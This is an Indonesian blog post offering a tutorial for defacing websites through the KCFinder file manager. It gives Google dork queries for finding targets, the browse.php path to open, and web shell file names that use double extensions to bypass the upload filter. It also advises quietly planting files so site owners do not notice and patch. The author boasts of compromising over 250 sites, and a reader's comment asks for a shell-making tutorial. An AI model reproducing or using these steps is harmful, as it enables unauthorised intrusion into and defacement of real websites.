Lama ga buat tutor ^^
kali ini gw bakal share tutor deface poc kcfinder. poc andalan gw :'v maklum newbie.
emang sih ini poc lawas,pasti kalian berfikir mungkin akan susah cari web yg perawan. tapi itu semua kembali lagi kepada pinter2nya lu ngembangin dork ^^
buktinya gw bisa mirror in 250+ web fresh cuma pake ini poc :'v (pamer dikit)
oke langsung saja ke tutor
pertama dorking dulu seperti biasa
inurl:/kcfinder
inurl:/kcfinder site:(isi nama domain)
inurl:/ckeditor/kcfinder
inurl:/modules/
inurl:/plugins
lainnya kembangin sendiri :'v
setelah dapet web yg kalian suka.
masukan exploitnya
http://site.co.li/path/kcfinder/browse.php
maka akan muncul seperti ini
jika muncul seperti itu + belum ada orang yg tanem shell di situ . berbahagialah :'v
langsung saja lu upload shell kesayangan kalian
shell bisa berformat seperti ini :
namashell.php.xxxjpg
namashell.php.pjpg
namashell.php5
jika vuln. maka shell kita akan terupload seperti itu
kemudian buka shell kalian dengan
http://site.co.li/path/kcfinder/upload/files/namashellmu
dan tara
silahkan mau diapakan webnya ^^
saran : klo dapet web domainnya banyak, titip file aja dulu. daripada ntar lu tebas index ketauan,padahal baru pepes dikit, shell lu di apus, web di patch , nyesel dah :'v (pengalaman)
sekian tutor dari gw ^^
1 comments:
Click here for commentsbang boleh request gak?
bang buatin tutor bikin shell untuk pemula dong.....plisss
ConversionConversion EmoticonEmoticon